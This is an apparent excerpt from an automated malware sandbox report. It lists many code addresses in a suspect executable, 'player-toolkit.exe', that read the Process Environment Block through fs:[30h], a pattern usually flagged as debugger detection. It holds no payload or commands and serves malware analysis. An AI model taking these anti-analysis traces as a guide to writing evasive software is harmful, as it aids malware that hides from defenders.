Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h]	2_2_029552A5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h]	2_2_029552A5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029552A5 mov eax, dword ptr fs:[00000030h]	2_2_029552A5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A14AEF mov eax, dword ptr fs:[00000030h]	2_2_02A14AEF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982ACB mov eax, dword ptr fs:[00000030h]	2_2_02982ACB
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982AE4 mov eax, dword ptr fs:[00000030h]	2_2_02982AE4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295AA16 mov eax, dword ptr fs:[00000030h]	2_2_0295AA16
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295AA16 mov eax, dword ptr fs:[00000030h]	2_2_0295AA16
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02955210 mov eax, dword ptr fs:[00000030h]	2_2_02955210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02955210 mov ecx, dword ptr fs:[00000030h]	2_2_02955210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02955210 mov eax, dword ptr fs:[00000030h]	2_2_02955210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02955210 mov eax, dword ptr fs:[00000030h]	2_2_02955210
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02973A1C mov eax, dword ptr fs:[00000030h]	2_2_02973A1C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02968A0A mov eax, dword ptr fs:[00000030h]	2_2_02968A0A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]	2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]	2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]	2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]	2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]	2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B236 mov eax, dword ptr fs:[00000030h]	2_2_0297B236
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02994A2C mov eax, dword ptr fs:[00000030h]	2_2_02994A2C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02994A2C mov eax, dword ptr fs:[00000030h]	2_2_02994A2C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1AA16 mov eax, dword ptr fs:[00000030h]	2_2_02A1AA16
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1AA16 mov eax, dword ptr fs:[00000030h]	2_2_02A1AA16
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]	2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]	2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]	2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]	2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]	2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]	2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]	2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]	2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A229 mov eax, dword ptr fs:[00000030h]	2_2_0297A229
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0B260 mov eax, dword ptr fs:[00000030h]	2_2_02A0B260
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0B260 mov eax, dword ptr fs:[00000030h]	2_2_02A0B260
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28A62 mov eax, dword ptr fs:[00000030h]	2_2_02A28A62
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029E4257 mov eax, dword ptr fs:[00000030h]	2_2_029E4257
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h]	2_2_02959240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h]	2_2_02959240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h]	2_2_02959240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959240 mov eax, dword ptr fs:[00000030h]	2_2_02959240
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0299927A mov eax, dword ptr fs:[00000030h]	2_2_0299927A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1EA55 mov eax, dword ptr fs:[00000030h]	2_2_02A1EA55
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A25BA5 mov eax, dword ptr fs:[00000030h]	2_2_02A25BA5
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298B390 mov eax, dword ptr fs:[00000030h]	2_2_0298B390
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982397 mov eax, dword ptr fs:[00000030h]	2_2_02982397
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298138B mov eax, dword ptr fs:[00000030h]	2_2_0298138B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298138B mov eax, dword ptr fs:[00000030h]	2_2_0298138B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298138B mov eax, dword ptr fs:[00000030h]	2_2_0298138B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02961B8F mov eax, dword ptr fs:[00000030h]	2_2_02961B8F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02961B8F mov eax, dword ptr fs:[00000030h]	2_2_02961B8F
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A0D380 mov ecx, dword ptr fs:[00000030h]	2_2_02A0D380
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1138A mov eax, dword ptr fs:[00000030h]	2_2_02A1138A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984BAD mov eax, dword ptr fs:[00000030h]	2_2_02984BAD
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984BAD mov eax, dword ptr fs:[00000030h]	2_2_02984BAD
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02984BAD mov eax, dword ptr fs:[00000030h]	2_2_02984BAD
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A023E3 mov ecx, dword ptr fs:[00000030h]	2_2_02A023E3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A023E3 mov ecx, dword ptr fs:[00000030h]	2_2_02A023E3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A023E3 mov eax, dword ptr fs:[00000030h]	2_2_02A023E3
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D53CA mov eax, dword ptr fs:[00000030h]	2_2_029D53CA
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D53CA mov eax, dword ptr fs:[00000030h]	2_2_029D53CA
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]	2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]	2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]	2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]	2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]	2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029803E2 mov eax, dword ptr fs:[00000030h]	2_2_029803E2
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297DBE9 mov eax, dword ptr fs:[00000030h]	2_2_0297DBE9
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A309 mov eax, dword ptr fs:[00000030h]	2_2_0297A309
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A1131B mov eax, dword ptr fs:[00000030h]	2_2_02A1131B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295F358 mov eax, dword ptr fs:[00000030h]	2_2_0295F358
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295DB40 mov eax, dword ptr fs:[00000030h]	2_2_0295DB40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02983B7A mov eax, dword ptr fs:[00000030h]	2_2_02983B7A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02983B7A mov eax, dword ptr fs:[00000030h]	2_2_02983B7A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0295DB60 mov ecx, dword ptr fs:[00000030h]	2_2_0295DB60
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A28B58 mov eax, dword ptr fs:[00000030h]	2_2_02A28B58
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02959080 mov eax, dword ptr fs:[00000030h]	2_2_02959080
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D3884 mov eax, dword ptr fs:[00000030h]	2_2_029D3884
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D3884 mov eax, dword ptr fs:[00000030h]	2_2_029D3884
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298F0BF mov ecx, dword ptr fs:[00000030h]	2_2_0298F0BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298F0BF mov eax, dword ptr fs:[00000030h]	2_2_0298F0BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298F0BF mov eax, dword ptr fs:[00000030h]	2_2_0298F0BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029990AF mov eax, dword ptr fs:[00000030h]	2_2_029990AF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]	2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]	2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]	2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]	2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]	2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029820A0 mov eax, dword ptr fs:[00000030h]	2_2_029820A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h]	2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov ecx, dword ptr fs:[00000030h]	2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h]	2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h]	2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h]	2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029EB8D0 mov eax, dword ptr fs:[00000030h]	2_2_029EB8D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B8E4 mov eax, dword ptr fs:[00000030h]	2_2_0297B8E4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297B8E4 mov eax, dword ptr fs:[00000030h]	2_2_0297B8E4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029540E1 mov eax, dword ptr fs:[00000030h]	2_2_029540E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029540E1 mov eax, dword ptr fs:[00000030h]	2_2_029540E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029540E1 mov eax, dword ptr fs:[00000030h]	2_2_029540E1
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029558EC mov eax, dword ptr fs:[00000030h]	2_2_029558EC
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7016 mov eax, dword ptr fs:[00000030h]	2_2_029D7016
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7016 mov eax, dword ptr fs:[00000030h]	2_2_029D7016
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D7016 mov eax, dword ptr fs:[00000030h]	2_2_029D7016
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h]	2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h]	2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h]	2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297A830 mov eax, dword ptr fs:[00000030h]	2_2_0297A830
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h]	2_2_0298002D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h]	2_2_0298002D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h]	2_2_0298002D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h]	2_2_0298002D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298002D mov eax, dword ptr fs:[00000030h]	2_2_0298002D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A24015 mov eax, dword ptr fs:[00000030h]	2_2_02A24015
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A24015 mov eax, dword ptr fs:[00000030h]	2_2_02A24015
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h]	2_2_0296B02A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h]	2_2_0296B02A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h]	2_2_0296B02A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0296B02A mov eax, dword ptr fs:[00000030h]	2_2_0296B02A
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02970050 mov eax, dword ptr fs:[00000030h]	2_2_02970050
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02970050 mov eax, dword ptr fs:[00000030h]	2_2_02970050
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A12073 mov eax, dword ptr fs:[00000030h]	2_2_02A12073
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A21074 mov eax, dword ptr fs:[00000030h]	2_2_02A21074
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h]	2_2_02A149A4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h]	2_2_02A149A4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h]	2_2_02A149A4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02A149A4 mov eax, dword ptr fs:[00000030h]	2_2_02A149A4
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_02982990 mov eax, dword ptr fs:[00000030h]	2_2_02982990
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0297C182 mov eax, dword ptr fs:[00000030h]	2_2_0297C182
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_0298A185 mov eax, dword ptr fs:[00000030h]	2_2_0298A185
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h]	2_2_029D51BE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h]	2_2_029D51BE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h]	2_2_029D51BE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029D51BE mov eax, dword ptr fs:[00000030h]	2_2_029D51BE
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov eax, dword ptr fs:[00000030h]	2_2_029799BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 2_2_029799BF mov ecx, dword ptr fs:[00000030h]	2_2_029799BF
